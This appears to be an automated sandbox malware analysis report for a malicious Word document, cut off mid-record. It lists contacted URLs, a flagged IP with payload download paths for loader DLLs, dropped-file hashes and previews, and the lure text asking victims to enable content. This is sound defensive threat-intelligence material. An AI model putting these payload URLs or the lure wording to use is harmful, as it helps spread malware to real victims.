                                                                                                                        https://outlook.office365.com/9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                          high
                                                                                                                          https://webshell.suite.office.com9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                            high
                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                              high
                                                                                                                              https://substrate.office.com/search/api/v1/SearchHistory9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                                high
                                                                                                                                https://management.azure.com/9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.lifecycle.office.com/getcustommessage169776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://clients.config.office.net/c2r/v1.0/InteractiveInstallation9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://login.windows.net/common/oauth2/authorize9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://graph.windows.net/9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://api.powerbi.com/beta/myorg/imports9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://devnull.onenote.com9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://messaging.action.office.com/9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://ncus.pagecontentsync.9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://messaging.office.com/9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      45.8.146.139
                                                                                                                                                      unknownRussian Federation
                                                                                                                                                      44676VMAGE-ASRUfalse
                                                                                                                                                      Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                      Analysis ID:682633
                                                                                                                                                      Start date and time:2022-08-11 19:40:09 +02:00
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 6m 34s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Sample file name:berniesbooksdocument08.11.doc
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:28
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • GSI enabled (VBA)
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal68.expl.winDOC@1/11@0/1
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:Failed
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Found application associated with file extension: .doc
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer
                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.32.24, 52.109.12.23, 52.109.88.39
                                                                                                                                                      • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                      No simulations
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      45.8.146.139valliant.document.08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f
                                                                                                                                                      suddenlink file 08.11.22.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139/fhfty/U-CXQ4A0CVQ_DMT42DN0TYZCE_E_1XMH/-f
                                                                                                                                                      cnewton doc 08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
                                                                                                                                                      suddenlink file 08.11.22.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139/fhfty/U-CXQ4A0CVQ_DMT42DN0TYZCE_E_1XMH/-f
                                                                                                                                                      valliant.document.08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f
                                                                                                                                                      valliant.document.08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f
                                                                                                                                                      cnewton doc 08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
                                                                                                                                                      cnewton doc 08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
                                                                                                                                                      airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
                                                                                                                                                      wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
                                                                                                                                                      airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
                                                                                                                                                      airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
                                                                                                                                                      wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
                                                                                                                                                      wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
                                                                                                                                                      courtesyautomotivedoc08.11.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll
                                                                                                                                                      drinkcodeblue.file.08.11.22.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139/fhfty/IJQ_OLG8QW9DFH32ZO8BOJQ-PC_3SXMS/rm
                                                                                                                                                      dodsonimaging,file,08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm
                                                                                                                                                      feltenberger doc 08.11.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139/fhfty/R_PVSJYED3P2FDSONZYADP8GFZZLOA8D/loader_p3_dll_64_n5_crypt_x64_asm_clone_n101.dll
                                                                                                                                                      agsilverfile08.11.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139/fhfty/A0S35FRY5H5A0Q5SG6-TE3J_HSFO5KES/loader_p3_dll_64_n5_crypt_x64_asm_clone_n19.dll
                                                                                                                                                      No context
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      VMAGE-ASRUactionplan doc 08.11.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139
                                                                                                                                                      c9sllc.invoice.08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139
                                                                                                                                                      berniesbooksdocument08.11.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139
                                                                                                                                                      actionplan doc 08.11.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139
                                                                                                                                                      c9sllc.invoice.08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139
                                                                                                                                                      actionplan doc 08.11.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139
                                                                                                                                                      suddenlink file 08.11.22.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139
                                                                                                                                                      valliant.document.08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139
                                                                                                                                                      suddenlink file 08.11.22.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139
                                                                                                                                                      cnewton doc 08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139
                                                                                                                                                      suddenlink file 08.11.22.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139
                                                                                                                                                      valliant.document.08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139
                                                                                                                                                      valliant.document.08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139
                                                                                                                                                      cnewton doc 08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139
                                                                                                                                                      cnewton doc 08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139
                                                                                                                                                      airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139
                                                                                                                                                      wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139
                                                                                                                                                      airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139
                                                                                                                                                      airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139
                                                                                                                                                      wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
                                                                                                                                                      • 45.8.146.139
                                                                                                                                                      No context
                                                                                                                                                      No context
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):148061
                                                                                                                                                      Entropy (8bit):5.3581472434791655
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:zcQW/gxgB5BQguwN/Q9DQe+zQTk4F77nXmvid3XxVETLKz61:K1Q9DQe+zuXYr
                                                                                                                                                      MD5:ACC825E2E9E38DC8B695DC06C6E81DCF
                                                                                                                                                      SHA1:721511992C31C9A85B297EB8DE71CC4CD1AAE4C0
                                                                                                                                                      SHA-256:32D1183E3B7FFF51F028F2D92B501171AA84E81654449D0BF1A2B9C2BE6FD1F1
                                                                                                                                                      SHA-512:B0847AA1439F55B4B377D49B5227ABF251CB3A365BD78B9A967DF3F850CA8ABE68F01286B315AE3885167AAA1F40DE7EE3ACD499A615AD5F1388A959A531BD3D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-08-11T17:41:17">.. Build: 16.0.15607.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:PNG image data, 440 x 440, 8-bit/color RGBA, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):256671
                                                                                                                                                      Entropy (8bit):7.979736340067979
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:Vfyh4MxT1EpRNkndfG4Ir9+2H1RKOqub+rERqbbp3IbFy:NetTcREfPIHH1Rrqq+rEMbbp308
                                                                                                                                                      MD5:5D6FF676E3D91EA33D11782C19FFAF1E
                                                                                                                                                      SHA1:EB5C878B461B6697A0AED6CDF46271D082D26EDA
                                                                                                                                                      SHA-256:6AD88EF0BBE4928886AFCBE59B5C6AF268BC8962DEA7636C7BFB4A593A6FD77C
                                                                                                                                                      SHA-512:5533683E86C4E76D4183C5733FA9EAEDEB81157C5215C7C1E95531E70C1326B72AD8ADE41F284368A42D0DC51AC948730D81D3630246519270D39281297269E5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview:.PNG........IHDR.............7......sRGB.........gAMA......a.....pHYs..!...!..........IDATx^.....GU.39..x...:....<.....E........ (..$!........3.0......h+2.FQ..a.$...=$aN....{=kgu...7.u..V.Z5<UkU.S..6........_.-H....-.d.6.....m.[z.M.Yu.......*=.g[A/_.%f.....U.dTZ.[.ci.N...m<Q.t0+o>..L..V...t`.....x......@;>I.{...|.;.?..<..^...=....Z...z.-o..{|-........S.I...".Z9.. \.... ..ie..m....g...p..%za.Zf.YA2..]...>+o..x..... .....W..0H.'....*z.DM..k..5...*O....R.H....x...c..X..p.GK...p......L..*.N..S..x+....Z.g...{.....c...2..+.....-...e..{<..8I.6=.`VZE..kz....xE...+.....d.$..D.>..m.(B...B....j....~K..^..3...=Z..Wyg.K.. .u....hi.W]U|8..g..pE....C....*........i.@.N.........o.[:.......A..D/.~..ZZ.KzMoAZ}....*.......=:h..^}@.>.c...n1+OM.p[N..g..5^.zHY....8.=.6..v@%2..k:h.-..O.:............$...>..'..KPN[.....t..mZ..W..z|.....?.c<UV..h-.g?...Z$....y...V.l[.j..0...W....Yi .cy{.y....../]..........*2...Md<yk<1..~...'.xE/-e.1.1..c|.....e.....
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:PNG image data, 410 x 568, 8-bit/color RGB, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):61935
                                                                                                                                                      Entropy (8bit):7.988218918927523
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:vFo53cC4vJ7Y8qgUmqhIIPI2MM+ikJU78DPaFx:vy53qv6nmII0I2ngJAEan
                                                                                                                                                      MD5:4800E90C87A78932178C7D338BA32F43
                                                                                                                                                      SHA1:8006244EDAFF9A31546A17FCF99CB61DA4F69417
                                                                                                                                                      SHA-256:8CD11EB654C64C7315F7B2904D123532F7993FAF2F210B250C4C4D670200FF73
                                                                                                                                                      SHA-512:58994BDC81FF937B05B307C161F852383DAA8504EA17522CD96CDE6EBF99E4992BA64DBEA532424AC16FBD8273999295DBBB74E48A77AAB2122C5701633DC7A3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                      Preview:.PNG........IHDR.......8......X.L.. .IDATx..}i..F.-..\r.E.l..u..3....L....^TR-.......DF...*I.e;i.:U.L&...pq.p.1.HD.Z.@.6.._cc..........>.n....2v..c.%...)..G.?|...>k...bf......c0.sy..$...a....<.......>".=X1.....1.^I|......|!.....I`E..c.#.T......'.'.....$6&L1.0.H...X&".cp.l...p.>..?.@?.1.Tp.....Y...=D.]....).w=...~..yp...{x/......d}1.G.h..b."1..-}.0x...O.......<. &n...0.1...eI...."".. ....C<t..A.H..4O.L.G....v...6Bd....W{..>..;W.....E.#<..s.^...Q...B.o.=l.lB{...1.ab.$D..:WB$O..V..>..k...y~.w".....A...-.D..;.I.4b.D..E".3...1...f....J.~xv.35G&&....?.acR...P.N....)...U.J....F.I...c$... .....a..z&...1..I...D...b.A4.......U.._.D.Z...E.6.G9t..=..qj...^L.$.;...>..S&dD.X... 1...0.{~.w..P.....1.U(.....j.PM......9J..[.O2...).12swy%.3..M?NGt_.......Z..........?F..+.....[4@.=.......;.".6..i.c..qH4...Ll...8.kI....="".!..h.g7.\'......Bb.A...f..o).+..`..++..?u..<.i.M..Gvs..@w.$.2X..'.[.h.8h.3..G.g.E...3..d.)..V*../$)...."%...F....~...s.1@|.....dE.8D|..d..........N.z..(...
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1536
                                                                                                                                                      Entropy (8bit):2.123533094102747
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:DMlzfRLZRW4WZ1MFKuQ9cc3xn82lakwkvzlPvllvlHll4vlwZZJ/vlk:4LG1ND9Pxn824krDziT
                                                                                                                                                      MD5:42351AB6AF2118C6741D423B8C584B9B
                                                                                                                                                      SHA1:B218C3ECC3620AB6EDE75FFAC962CA99D4927DE7
                                                                                                                                                      SHA-256:B43CF154493DCC883CFDA39EF5A16F2BC749554FA7804159BD8491FF7A86A8F9
                                                                                                                                                      SHA-512:382BBD1ACA119E158C3C4486516451FEC66F5E616C5A3437FB94B54F5B2E651E76FDB81BD6310A0B69C661C600A1F0AA04D1C27D25430AE8D51D01D753A9FC26
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview:.././...T.h.i.s. .d.o.c.u.m.e.n.t. .c.r.e.a.t.e.d. .i.n. .p.r.e.v.i.o.u.s. .v.e.r.s.i.o.n. .o.f. .M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .W.o.r.d.....T.o. .v.i.e.w. .o.r. .e.d.i.t. .t.h.i.s. .d.o.c.u.m.e.n.t.,. .p.l.e.a.s.e. .c.l.i.c.k. .. E.n.a.b.l.e. .e.d.i.t.i.n.g.. .b.u.t.t.o.n. .o.n. .t.h.e. .t.o.p. .b.a.r.,. .a.n.d. .t.h.e.n. .c.l.i.c.k. .. E.n.a.b.l.e. .c.o.n.t.e.n.t.. ..........................................................................................................................................................z.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1024
                                                                                                                                                      Entropy (8bit):0.05390218305374581
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):51200
                                                                                                                                                      Entropy (8bit):4.452242565616529
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:768:Bi10Cw76gITZvoUUOtLuvrKIeRorvl3BCj:Bi6Cq6gQvVVtKpOor
                                                                                                                                                      MD5:FCE4A2005F82DC3921C8173CEB620F76
                                                                                                                                                      SHA1:23C7D88603074F06F6439EA4CAD9551554D6AEC9
                                                                                                                                                      SHA-256:454E963A3441186E1366D1495F7CA2F56005FA0572FD596F25758557F5A4D66F
                                                                                                                                                      SHA-512:C6937D4E02BECE3E9E7638194E35CDB3D42DB7A0053271018B2FFA7854FFB2112BC5B846A43739688826EACD0BED983C93CEDC05F221763F8224F2E9DAFB92BD
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      Preview:......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................G...........&........................................................................................................... ...!..."...#...$...%.......'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8.......:...;...<...=...>.......@...A...B...C...D...E...F...9...^...I...J...K...O...M...N.......P...Q...Z...S...T...U...V...W...X...Y...L...[...\...]..._.......`...a...b...................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:46 2022, mtime=Fri Aug 12 01:41:20 2022, atime=Fri Aug 12 01:41:12 2022, length=2204163, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1130
                                                                                                                                                      Entropy (8bit):4.724353926945833
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:8hbZWs1RU9uElPCH2KcbYtLQ+WwN1Hl9BiqOjAT/3cmwBi+DwlgP5gR4t2Y+xIBx:8hb4IcM1H5iATPcb1DwCPO77aB6m
                                                                                                                                                      MD5:02C426E74D3EBEABDF5304DD44FBB9E8
                                                                                                                                                      SHA1:6090705DCB0C4D8ED7CEC5D320E952BBED59241E
                                                                                                                                                      SHA-256:DE9D8D8E3DCC51422116E4058EE7963AE0CD3188A834EB81C7A6FB0AEB8D905D
                                                                                                                                                      SHA-512:8DED508909945E316178AEC28E7198CDA4E707C3CB415DCAF443B76CBEF4F0E503DF8636FA3152F68C3CFF96D8BE7B87E9C3139359546685F4F18DAA9228B71A
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview:L..................F.... ........3...J......_.M.......!..........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...U......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....hT....user.<.......Ny..U.......S....................,&|.h.a.r.d.z.....~.1.....hT....Desktop.h.......Ny..U.......Y..............>.....od9.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2...!..U'. .BERNIE~1.DOC..l......hT...U'.....h.........................b.e.r.n.i.e.s.b.o.o.k.s.d.o.c.u.m.e.n.t.0.8...1.1...d.o.c.......c...............-.......b...........>.S......C:\Users\user\Desktop\berniesbooksdocument08.11.doc..4.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.b.e.r.n.i.e.s.b.o.o.k.s.d.o.c.u.m.e.n.t.0.8...1.1...d.o.c.........:..,.LB.)...As...`.......X.......760639...........!a..%.H.VZAj...w............-..!a..%.H.VZAj...w............-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):109
                                                                                                                                                      Entropy (8bit):4.656786023512679
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:bDuMJlfyNS58JRQUjdzCmX14BS58JRQUjdzCv:bCUyZJG4dz6dJG4dzs
                                                                                                                                                      MD5:88A6F1F506240DB87837382649E2F57A
                                                                                                                                                      SHA1:33553CF8F2A0D6E3CFB55B8A0C3AE4A032F743FB
                                                                                                                                                      SHA-256:E644F2C0DCE8F75BBFB91D2308FDAF411DDFA8EF0E31D70CBA46A544B927CC97
                                                                                                                                                      SHA-512:30F696EC999D2B58C16B7B91E96377B4C05A2B6292D325A4189A3971B1523D6997CEC542999692D6F8F0B67CC8FD000799FA169B32421A0AC9B6E23EF5FB95D2
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:[folders]..Templates.LNK=0..berniesbooksdocument08.11.doc.LNK=0..[doc]..berniesbooksdocument08.11.doc.LNK=0..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):162
                                                                                                                                                      Entropy (8bit):3.353959910568412
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Rl/Zd+vkT/hSR+MgQ/luMClqKnmZlqfZ:RtZ/ixuA8mmfZ
                                                                                                                                                      MD5:2992D726CEBB2BBB07315BCF73B645A6
                                                                                                                                                      SHA1:60198AF79AA2A8BC1A8641BF70B1431C0BE991FE
                                                                                                                                                      SHA-256:44B46EB18FE8D422F7C1744B58E2CA22415212E5054B6E573AE55E8C82ED1F2F
                                                                                                                                                      SHA-512:AE3815CB0302481405EED6A3E7710FDC86C9D6C99A4DB4877EB53179370F4ED206BD601C04BFEA16907B2AA87330F743A389EDE716603A3896AB88BEED0666E6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.pratesh................................................p.r.a.t.e.s.h..........C.).$...^.i@..iT..i`..iDB.iZR.i.C.).%..........T.......6C.......C.).&...........
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2
                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Qn:Qn
                                                                                                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):162
                                                                                                                                                      Entropy (8bit):3.353959910568412
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Rl/Zd+vkT/hSR+MgQ/luMClqKnmZlqfZ:RtZ/ixuA8mmfZ
